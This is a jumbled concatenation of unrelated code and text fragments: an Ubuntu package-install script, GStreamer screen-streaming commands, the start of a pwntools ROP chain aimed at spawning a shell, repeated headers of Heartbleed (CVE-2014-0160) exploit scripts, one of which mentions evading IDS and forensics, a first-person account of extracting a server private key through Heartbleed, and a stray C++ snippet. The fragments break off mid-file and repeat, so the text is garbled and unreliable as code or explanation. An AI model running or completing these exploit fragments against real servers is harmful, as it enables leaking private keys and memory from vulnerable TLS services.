#!/bin/bash
sudo apt-get update;
sudo apt-get upgrade;
sudo apt-get install autoconf automake gcc make git;
sudo apt-get install libffi-dev libncurses5-dev openssl patch python-dev python-virtualenv libreadline6-dev libsqlite3-dev libbz2-dev;
sudo apt-get install libsqlite3-dev libbz2-dev libdb5.3-dev tk8.6-dev libncurses5-dev libssl-dev libgdbm-dev;
wget https://launchpad.net/ubuntu/+archive/primary/+files/python2.7_2.7.11.orig.tar.gz;

# Linux send h264 rtp stream:
gst-launch-1.0 -v ximagesrc ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000
# macOS send h264 rtp stream:
gst-launch-1.0 -v avfvideosrc capture-screen=true ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000
# receive h264 rtp stream:
gst-launch-1.0 -v udpsrc port=5000 caps = "application/x-rtp, media=(string)video, clock-rate=(int)90000, encoding-name=(string)H264, payload=(int)96" ! rtph264depay ! decodebin ! videoconvert ! autovideosink

from pwn import *
from struct import pack
context(arch='i386', os='linux', log_level='debug')
p = ''
p += pack('<I', 0x0806ed0a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080bb406) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x080a1dad) # mov dword ptr [edx], eax ; ret

#!/usr/bin/env python2
"""
Author: takeshix <[email protected]>
PoC code for CVE-2014-0160. Original PoC by Jared Stafford ([email protected]).
Supports all versions of TLS and has STARTTLS support for SMTP, POP3, IMAP, FTP and XMPP.
"""
import sys,struct,socket
from argparse import ArgumentParser

I wasn't first to get the key. Nor was I second, third, or even fourth. I'm probably not even the
10th to get it (ok, looks like I was the 7th.) But I'm happy that I was able to prove to myself
that I too could do it.
First, I have to admit I was a skeptic. Like the handful of other dissenters, I had initially
believed that it would be highly improbable under normal conditions to obtain the private key
through exploiting Heartbleed. So this was my motivation for participating in Cloudflare's
challenge. I had extracted a lot of other things with Heartbleed, but I hadn't actually set out to
extract private keys. So I wanted to see first-hand if it was possible or not.

/*
* CVE-2014-0160 heartbleed OpenSSL information leak exploit
* =========================================================
* This exploit uses OpenSSL to create an encrypted connection
* and trigger the heartbleed leak. The leaked information is
* returned encrypted and is then decrypted, decompressed and
* written to a file to annoy IDS/forensics.
*
* https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c
* https://raw.githubusercontent.com/decal/ssltest-stls/master/ssltest-stls.py

#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])
# Modified by Derek Callaway ([email protected]) to add STARTTLS protocols
# The authors disclaim copyright to this source code.
import sys
import struct

/*
* CVE-2014-0160 heartbleed OpenSSL information leak exploit
* =========================================================
* This exploit uses OpenSSL to create an encrypted connection
* and trigger the heartbleed leak. The leaked information is
* returned encrypted and is then decrypted, decompressed and
* written to a file to annoy IDS/forensics. The exploit can set
* the heartbeat payload length arbitrarily or use two preset
* values for 0x00 and MAX length. The vulnerability occurs due
* to bounds checking not being performed on a heap value which

#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select

#include <cstdio>
#include <vector>
#include <bitset>
#include <climits>
#include <iostream>
using namespace std;
#define MAX 15
vector<bitset<MAX> > vec;